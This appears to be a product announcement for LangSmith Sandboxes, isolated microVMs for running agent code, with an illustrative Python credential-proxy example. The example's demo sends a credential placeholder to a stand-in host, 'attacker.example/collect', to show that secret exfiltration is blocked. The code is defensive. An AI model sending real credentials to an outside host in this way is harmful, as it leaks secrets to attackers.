Secure Code Execution for AI Agents
LangSmith Sandboxes let AI agents run arbitrary code in locked-down environments without putting your infrastructure at risk. Traditional containers are designed for application code you know and trust; sandboxes are built for untrusted, unpredictable agent-generated code, which can attempt destructive or malicious actions and must be treated as hostile until it is properly isolated.
Key Features Shipping Today
Runtime & Configuration:
- Bring your own Docker images or use LangSmith defaults for custom environments
- Sandbox templates let you define image, CPU, and memory once and reuse across multiple agent invocations
- Pooling keeps warm sandboxes ready so agent calls avoid cold starts, and autoscaling spins up additional sandboxes as demand increases
Execution Capabilities:
- Long-running sessions keep commands alive over WebSockets and stream their output in real time, for agent tasks that run for minutes to hours
- Persistent state carries files, installed packages, and environment variables across multiple agent interactions
- Port tunnels expose sandbox services to your local machine for preview and testing
Security & Integration:
- Hardware-virtualized microVM isolation between sandboxes: each sandbox runs on its own guest kernel rather than sharing the host kernel through Linux namespaces, so the host kernel is not the shared attack surface it is with namespace-only containers
- Authentication Proxy keeps credentials off the sandbox entirely, so the agent code running inside never holds the secrets it acts with
- Framework-agnostic SDKs for Python and JavaScript with native integration to LangChain's Deep Agents framework
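The credential-injection pattern behind an authentication proxy, as an added Python example (not LangSmith's code or API): code inside the sandbox names a credential by an opaque placeholder, and the proxy outside the sandbox holds the real secret and swaps it in only for the hosts that credential is allowed to reach, so a misbehaving or compromised agent cannot redirect the request to exfiltrate the token. The `sbx-cred:` placeholder convention, the `CredentialProxy` class, and the dummy token value are assumptions made for this illustration.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumed placeholder convention for this illustration: sandbox code writes
# "sbx-cred:<name>" where a credential belongs; only the proxy can resolve it.
PLACEHOLDER_PREFIX = "sbx-cred:"


@dataclass
class Request:
    method: str
    url: str
    headers: dict[str, str] = field(default_factory=dict)
    body: bytes = b""


class CredentialProxy:
    """Runs outside the sandbox. Holds the real secrets and the hosts each
    secret may be sent to, and rewrites placeholders on the way out."""

    def __init__(self, secrets: dict[str, str], allowed_hosts: dict[str, set[str]]):
        self._secrets = secrets            # name -> real credential
        self._allowed_hosts = allowed_hosts  # name -> hosts it may be sent to

    def _resolve(self, value: str, host: str) -> str:
        # Replace every placeholder in a header value, refusing any credential
        # that is not authorised for the destination host. Without this check
        # the proxy is a secret oracle: point the request at your own host and
        # read the token off the wire.
        out = []
        for token in value.split(" "):
            if token.startswith(PLACEHOLDER_PREFIX):
                name = token[len(PLACEHOLDER_PREFIX):]
                if name not in self._secrets:
                    raise KeyError(f"unknown credential {name!r}")
                if host not in self._allowed_hosts.get(name, set()):
                    raise PermissionError(f"credential {name!r} may not be sent to {host}")
                token = self._secrets[name]
            out.append(token)
        return " ".join(out)

    def forward(self, req: Request) -> Request:
        host = urlsplit(req.url).hostname or ""
        headers = {k: self._resolve(v, host) for k, v in req.headers.items()}
        return Request(req.method, req.url, headers, req.body)


def leaks_secret(req: Request, secrets: dict[str, str]) -> bool:
    """True if any real secret appears anywhere in a request. The request the
    sandbox produces must always fail this check; the proxied one will pass it."""
    blob = req.url + " ".join(f"{k}: {v}" for k, v in req.headers.items())
    blob += req.body.decode(errors="replace")
    return any(s in blob for s in secrets.values())


# Constructed values for the demo; the token is a dummy, not a real credential.
REAL_SECRETS = {"github": "ghp_CONSTRUCTED_EXAMPLE_TOKEN"}
ALLOWED_HOSTS = {"github": {"api.github.com"}}


def sandbox_request(url: str) -> Request:
    # What agent-generated code inside the sandbox produces: it only ever
    # sees the placeholder, never the credential.
    return Request("GET", url, headers={"Authorization": f"Bearer {PLACEHOLDER_PREFIX}github"})


def demo() -> dict:
    proxy = CredentialProxy(REAL_SECRETS, ALLOWED_HOSTS)
    inside = sandbox_request("https://api.github.com/user/repos")
    outside = proxy.forward(inside)
    try:
        proxy.forward(sandbox_request("https://attacker.example/collect"))
        exfil_blocked = False
    except PermissionError:
        exfil_blocked = True
    return {
        "sandbox_sees_secret": leaks_secret(inside, REAL_SECRETS),
        "upstream_auth": outside.headers["Authorization"],
        "exfil_blocked": exfil_blocked,
    }


if __name__ == "__main__":
    print(demo())
```

The host allow-list is the part that matters for security: a proxy that resolves placeholders for any destination merely moves the secret one hop, since the sandbox can still send the placeholder to a host it controls and collect the real token there.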
Roadmap
LangSmith is actively developing shared volumes for cross-sandbox state management, binary authorization to restrict executable programs and network access, and full execution tracing inside VMs to provide audit logs of all processes and network calls.
Getting Started
Sign up for private preview at langchain.com/langsmith-sandboxes-waitlist to start building agents that safely execute code.